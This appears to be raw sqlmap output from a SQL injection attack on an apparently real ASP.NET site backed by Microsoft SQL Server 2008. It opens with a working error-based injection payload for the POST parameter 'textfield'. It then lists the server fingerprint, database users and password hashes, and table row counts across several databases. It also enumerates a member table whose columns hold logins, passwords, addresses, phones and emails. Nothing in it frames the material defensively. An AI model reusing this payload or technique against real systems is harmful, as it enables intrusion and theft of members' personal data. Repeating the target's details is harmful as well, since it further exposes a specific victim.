---
Parameter: textfield (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: textfield=aNIB'+(SELECT 'BZrt' WHERE 6983=6983 AND 7380=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7380=7380) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(113))))+'&imageField.x=1&imageField.y=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'usr_tma'
current user is DBA: False
database management system users [2]:
[*] sa
[*] usr_tma

database management system users password hashes:
[*] sa [1]:
    password hash: NULL
[*] usr_tma [1]:
    password hash: NULL

Database: db_tma
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory | 690727 |
| dbo.tblmkt_fix | 156464 |
| dbo.tblmkt_fix_20150922 | 138446 |
| dbo.tblmkt_fix_20150713 | 113983 |
| dbo.tblmkt_fix_20150421 | 112229 |
| dbo.tblmkt_fix_20130923 | 94418 |
| dbo.tblmkt_fix_20130705 | 64130 |
| dbo.tblCourse | 64058 |
| dbo.tblCourse_20150929 | 62219 |
| dbo.tblmkt_fix_20121224 | 58338 |
| dbo.tblCourse_20140213 | 53987 |
| dbo.tblCourse_20140124 | 53798 |
| dbo.tblCourse_v1 | 53798 |
| dbo.tblCourse_20130916 | 50453 |
| dbo.tblCourse_20121224xxx | 47104 |
| dbo.tblFee | 17409 |
| dbo.tblFee_20121116 | 12595 |
| dbo.CPT1 | 11321 |
| dbo.tblMemberHistory | 8816 |
| dbo.tblData | 6793 |
| dbo.tblMemberRenew | 6459 |
| dbo.tblMemberRenew_history | 4552 |
| dbo.tblMemberHistory_20121218 | 3973 |
| dbo.tblbank_intrate | 3658 |
| dbo.tblMember | 3036 |
| dbo.tblMember_20121218 | 2843 |
| dbo.tblMember_20121224 | 2843 |
| dbo.countDuplicateMemberId | 2739 |
| dbo.tblmkt_fix_20120318 | 2532 |
| dbo.tblCount | 1857 |
| dbo.tblMemberRenew_20121218 | 1703 |
| dbo.tblMemberRenew_20121218_notuse | 1703 |
| dbo.tblMemberRenew_20121212 | 1691 |
| dbo.tblEduct | 646 |
| dbo.tblEduct_20121224 | 490 |
| dbo.tblJob | 404 |
| dbo.tblCPT | 257 |
| dbo.tblNews | 185 |
| dbo.tblBloomberg | 157 |
| dbo.tblmkt_fixsetting | 143 |
| dbo.tblmkt_fixsetting_20140916 | 111 |
| dbo.tblmkt_fixsetting_20150713 | 111 |
| dbo.tblComm | 100 |
| dbo.tblbank_holiday | 89 |
| dbo.tblmkt_fixsetting_20130705 | 84 |
| dbo.tblPublication | 53 |
| dbo.seed | 37 |
| dbo.tblEventSection | 30 |
| dbo.tblmkt_fixtyphoon_dtl | 23 |
| dbo.tblUrl | 21 |
| dbo.tblEventSession | 14 |
| dbo.tblbank | 13 |
| dbo.tblEvent | 12 |
| dbo.tblGroup | 12 |
| dbo.tblbank_intrate_config | 11 |
| dbo.tblNB | 11 |
| dbo.tblmkt_fixtyphoon | 10 |
| dbo.tblConfig | 8 |
| dbo.tblemailformat | 8 |
| dbo.tblemailformat_20140113 | 8 |
| dbo.tblemailformat_20140117 | 8 |
| dbo.tblemailformat_20140121 | 8 |
| dbo.tblemailformat_20141013 | 8 |
| dbo.tblemailformat_20141124 | 8 |
| dbo.tblemailformat_20151013 | 8 |
| dbo.tblemailformat_20151113 | 8 |
| dbo.tblRegForm | 8 |
| dbo.tblemailformat_20121224 | 7 |
| dbo.tblemailformat_20131209 | 7 |
| dbo.tblemailformat_20131230 | 7 |
| dbo.tblStatus | 5 |
| dbo.tblstaff | 4 |
| dbo.tblPMComm | 3 |
| dbo.tblPubCat | 3 |
| dbo.tblbank_staff | 2 |
| dbo.tblAudit | 1 |
| dbo.tblbank_intrate_typhoon | 1 |
| dbo.tblbank_msg | 1 |
| dbo.tblBg | 1 |
| dbo.tblConsult | 1 |
| dbo.tblGoverence | 1 |
| dbo.tblMemberRenewSetting | 1 |
| dbo.tblObj | 1 |
| dbo.tblSys | 1 |
+------------------------------------+---------+

Database: db_tma_20121217
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.tblmkt_fixhistory | 471251 |
| dbo.tblmkt_fix | 58141 |
| dbo.tblCourse | 47000 |
| dbo.tblFee | 12606 |
| dbo.tblFee_20121116 | 12595 |
| dbo.tblMemberHistory | 3966 |
| dbo.tblMember | 2843 |
| dbo.countDuplicateMemberId | 2739 |
| dbo.tblmkt_fix_20120318 | 2532 |
| dbo.tblbank_intrate | 2072 |
| dbo.tblbank_intrate_history | 1910 |
| dbo.tblCount | 1857 |
| dbo.tblMemberRenew | 1703 |
| dbo.tblMemberRenew_20121212 | 1691 |
| dbo.tblCPT | 189 |
| dbo.tblNews | 157 |
| dbo.tblComm | 96 |
| dbo.tblBloomberg | 85 |
| dbo.tblmkt_fixsetting | 74 |
| dbo.tblPublication | 36 |
| dbo.seed | 35 |
| dbo.tblEventSection | 30 |
| dbo.tblUrl | 21 |
| dbo.tblbank_holiday | 20 |
| dbo.tblEventSession | 14 |
| dbo.tblbank | 13 |
| dbo.tblEvent | 12 |
| dbo.tblGroup | 12 |
| dbo.tblbank_intrate_config | 11 |
| dbo.tblNB | 10 |
| dbo.tblConfig | 8 |
| dbo.tblRegForm | 8 |
| dbo.tblemailformat | 6 |
| dbo.tblStatus | 5 |
| dbo.tblPMComm | 3 |
| dbo.tblstaff | 3 |
| dbo.tblbank_staff | 2 |
| dbo.tblbank_intrate_typhoon | 1 |
| dbo.tblbank_msg | 1 |
| dbo.tblBg | 1 |
| dbo.tblMemberRenewSetting | 1 |
| dbo.tblSys | 1 |
+------------------------------------+---------+

Database: msdb
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.backupfile | 207040 |
| dbo.backupset | 103520 |
| dbo.backupmediafamily | 103519 |
| dbo.backupmediaset | 103519 |
| dbo.syspolicy_configuration | 4 |
+------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+

Database: msdb
Table: backupset
[1 column]
+-----------------------+
| Column |
+-----------------------+
| is_password_protected |
+-----------------------+

Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+

Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+

Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+

columns LIKE 'pass' were found in the following databases:
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+

Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+

Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+

Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+

Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+

available databases [11]:
[*] db_betav1
[*] db_oldweb_tma
[*] db_tma
[*] db_tma_20121217
[*] db_tma_20121223
[*] db_tma_test
[*] db_tma_test2
[*] master
[*] model
[*] msdb
[*] tempdb

Database: db_tma
Table: tblMember
[50 columns]
+--------------------+
| Column |
+--------------------+
| Member2Addr1 | nvarchar |
| MemberACIDC | nvarchar |
| MemberACIDCYear | nvarchar |
| MemberACIDip | nvarchar |
| MemberACIDipYear | nvarchar |
| MemberACIM | nvarchar |
| MemberACIQuali | nvarchar |
| MemberACISC | nvarchar |
| MemberACISCYear | nvarchar |
| MemberAddr1 | nvarchar |
| MemberAddr2 | nvarchar |
| MemberAddr3 | nvarchar |
| MemberCease | nvarchar |
| MemberCName | nvarchar |
| MemberCollege | nvarchar |
| MemberContactTel | nvarchar |
| MemberCreateDate | datetime |
| Memberdisclosure | char |
| MemberDOJ | nvarchar |
| MemberEmail | nvarchar |
| MemberExpectGrad | datetime |
| MemberField | nvarchar |
| MemberFName | nvarchar |
| MemberFullName | nvarchar |
| MemberId | int |
| MemberInst |
| MemberLName | nvarchar |
| MemberLogin | nvarchar |
| MemberMajor |
| MemberMTel |
| MemberPosition | nvarchar |
| MemberProposer | nvarchar |
| MemberProposerInst | nvarchar |
| MemberPwd | nvarchar |
| MemberRenewal | nvarchar |
| MemberRenewAlert |
| MemberRmk | nvarchar |
| MemberSeconder |
| MemberSeconderInst | nvarchar |
| MemberSex | nvarchar |
| MemberStatus |
| MemberStudentId | nvarchar |
| MemberStudyForm | datetime |
| MemberStudyTo | datetime |
| MemberTel | nvarchar |
| MemberTitle |
| MemberTMACDSYear |
| MemberTMC | nvarchar |
| MemberTMCYear |
| OldMemberGroup |
+--------------------+